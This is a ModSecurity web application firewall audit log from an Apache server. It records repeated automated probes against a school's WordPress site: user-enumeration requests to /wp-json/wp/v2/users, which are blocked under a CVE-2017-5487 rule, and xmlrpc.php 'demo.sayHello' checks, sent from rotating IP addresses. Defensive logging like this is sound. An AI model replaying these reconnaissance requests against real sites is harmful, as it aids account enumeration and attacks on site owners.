Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b4857522-Z-- --325ae962-A-- [17/May/2025:08:13:42 +0700] aCfixhKi5m5upc8uMd6iGQAAANg 103.236.140.4 43704 103.236.140.4 8181 --325ae962-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.124.109 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.124.109 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --325ae962-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --325ae962-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747444422728852 2063 (- - -) Stopwatch2: 1747444422728852 2063; combined=971, p1=312, p2=633, p3=0, p4=0, p5=26, sr=67, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --325ae962-Z-- --0605641c-A-- [17/May/2025:08:13:45 +0700] aCfiyQTOsBn9MSWb6WJueQAAAIM 103.236.140.4 43706 103.236.140.4 8181 --0605641c-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.90.54 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.90.54 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --0605641c-C-- demo.sayHello --0605641c-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --0605641c-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747444425601480 5026 (- - -) Stopwatch2: 1747444425601480 5026; combined=3942, p1=438, p2=3285, p3=33, p4=34, p5=90, sr=67, sw=62, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0605641c-Z-- --8ed63473-A-- [17/May/2025:08:13:55 +0700] aCfi0xKi5m5upc8uMd6iGwAAAME 103.236.140.4 43712 103.236.140.4 8181 --8ed63473-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.124.109 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.124.109 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --8ed63473-C-- demo.sayHello --8ed63473-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --8ed63473-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747444435024765 5495 (- - -) Stopwatch2: 1747444435024765 5495; combined=3755, p1=494, p2=3076, p3=32, p4=35, p5=71, sr=62, sw=47, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8ed63473-Z-- --d43f9e11-A-- [17/May/2025:08:14:07 +0700] aCfi3wTOsBn9MSWb6WJuegAAAIQ 103.236.140.4 43716 103.236.140.4 8181 --d43f9e11-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 154.213.196.254 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.196.254 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --d43f9e11-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d43f9e11-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747444447199864 2963 (- - -) Stopwatch2: 1747444447199864 2963; combined=1291, p1=439, p2=822, p3=0, p4=0, p5=29, sr=74, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d43f9e11-Z-- --ae248146-A-- [17/May/2025:08:14:15 +0700] aCfi5xKi5m5upc8uMd6iHQAAAMU 103.236.140.4 43720 103.236.140.4 8181 --ae248146-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 154.213.196.254 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.196.254 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --ae248146-C-- demo.sayHello --ae248146-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --ae248146-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747444455931002 6480 (- - -) Stopwatch2: 1747444455931002 6480; combined=4634, p1=631, p2=3765, p3=40, p4=42, p5=94, sr=85, sw=62, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ae248146-Z-- --9ae46255-A-- [17/May/2025:08:19:33 +0700] aCfkJXyxdQCiyU1ENFcnfgAAAA8 103.236.140.4 43748 103.236.140.4 8181 --9ae46255-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.233.92.70 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.92.70 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --9ae46255-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --9ae46255-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747444773506165 2787 (- - -) Stopwatch2: 1747444773506165 2787; combined=1234, p1=424, p2=781, p3=0, p4=0, p5=29, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9ae46255-Z-- --00780128-A-- [17/May/2025:08:19:40 +0700] aCfkLHyxdQCiyU1ENFcnfwAAABI 103.236.140.4 43752 103.236.140.4 8181 --00780128-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.233.92.70 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.92.70 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --00780128-C-- demo.sayHello --00780128-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --00780128-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747444780881989 5404 (- - -) Stopwatch2: 1747444780881989 5404; combined=4021, p1=525, p2=3282, p3=29, p4=32, p5=91, sr=89, sw=62, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --00780128-Z-- --5c07a86e-A-- [17/May/2025:08:21:15 +0700] aCfki3yxdQCiyU1ENFcngQAAABQ 103.236.140.4 43758 103.236.140.4 8181 --5c07a86e-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.171.188 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.171.188 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --5c07a86e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --5c07a86e-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747444875259287 2833 (- - -) Stopwatch2: 1747444875259287 2833; combined=1244, p1=431, p2=783, p3=0, p4=0, p5=30, sr=77, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5c07a86e-Z-- --fa4c3812-A-- [17/May/2025:08:21:20 +0700] aCfkkHyxdQCiyU1ENFcngwAAABg 103.236.140.4 43762 103.236.140.4 8181 --fa4c3812-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.171.188 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.171.188 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --fa4c3812-C-- demo.sayHello --fa4c3812-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --fa4c3812-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747444880117505 6418 (- - -) Stopwatch2: 1747444880117505 6418; combined=4673, p1=587, p2=3845, p3=37, p4=42, p5=97, sr=80, sw=65, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --fa4c3812-Z-- --0a479d17-A-- [17/May/2025:08:21:26 +0700] aCfklnyxdQCiyU1ENFcnhQAAABc 103.236.140.4 43766 103.236.140.4 8181 --0a479d17-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 154.213.194.18 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.194.18 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --0a479d17-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --0a479d17-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747444886205821 3057 (- - -) Stopwatch2: 1747444886205821 3057; combined=1335, p1=465, p2=839, p3=0, p4=0, p5=31, sr=67, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0a479d17-Z-- --3c101c2d-A-- [17/May/2025:08:21:26 +0700] aCfklnyxdQCiyU1ENFcnhgAAAAI 103.236.140.4 43768 103.236.140.4 8181 --3c101c2d-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.242.34.59 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.34.59 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --3c101c2d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --3c101c2d-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747444886221904 1972 (- - -) Stopwatch2: 1747444886221904 1972; combined=1034, p1=340, p2=667, p3=0, p4=0, p5=27, sr=66, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3c101c2d-Z-- --b3d07b5b-A-- [17/May/2025:08:21:29 +0700] aCfkmRKi5m5upc8uMd6iJQAAANU 103.236.140.4 43770 103.236.140.4 8181 --b3d07b5b-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.233.92.124 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.92.124 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --b3d07b5b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b3d07b5b-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747444889799106 2796 (- - -) Stopwatch2: 1747444889799106 2796; combined=1246, p1=444, p2=773, p3=0, p4=0, p5=29, sr=77, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b3d07b5b-Z-- --e0e22254-A-- [17/May/2025:08:21:32 +0700] aCfknHyxdQCiyU1ENFcnigAAAAc 103.236.140.4 43778 103.236.140.4 8181 --e0e22254-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.242.34.59 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.34.59 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --e0e22254-C-- demo.sayHello --e0e22254-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --e0e22254-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747444892874970 5193 (- - -) Stopwatch2: 1747444892874970 5193; combined=3913, p1=565, p2=3156, p3=27, p4=28, p5=81, sr=63, sw=56, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e0e22254-Z-- --fd483924-A-- [17/May/2025:08:21:34 +0700] aCfknnyxdQCiyU1ENFcniwAAAAk 103.236.140.4 43782 103.236.140.4 8181 --fd483924-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.233.92.124 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.92.124 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --fd483924-C-- demo.sayHello --fd483924-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --fd483924-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747444894697253 5392 (- - -) Stopwatch2: 1747444894697253 5392; combined=4009, p1=494, p2=3139, p3=30, p4=33, p5=170, sr=75, sw=143, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --fd483924-Z-- --5580da42-A-- [17/May/2025:08:21:34 +0700] aCfknnyxdQCiyU1ENFcnjAAAAAo 103.236.140.4 43784 103.236.140.4 8181 --5580da42-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 154.213.194.18 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.194.18 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --5580da42-C-- demo.sayHello --5580da42-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --5580da42-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747444894872110 5285 (- - -) Stopwatch2: 1747444894872110 5285; combined=3962, p1=524, p2=3226, p3=30, p4=31, p5=89, sr=79, sw=62, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5580da42-Z-- --ba22eb39-A-- [17/May/2025:08:21:45 +0700] aCfkqXyxdQCiyU1ENFcnjwAAABE 103.236.140.4 43792 103.236.140.4 8181 --ba22eb39-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.116.74 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.116.74 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --ba22eb39-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ba22eb39-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747444905138725 2193 (- - -) Stopwatch2: 1747444905138725 2193; combined=1044, p1=346, p2=670, p3=0, p4=0, p5=27, sr=66, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ba22eb39-Z-- --209c774a-A-- [17/May/2025:08:21:50 +0700] aCfkrnyxdQCiyU1ENFcnkAAAAA4 103.236.140.4 43796 103.236.140.4 8181 --209c774a-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.116.74 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.116.74 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --209c774a-C-- demo.sayHello --209c774a-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --209c774a-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: 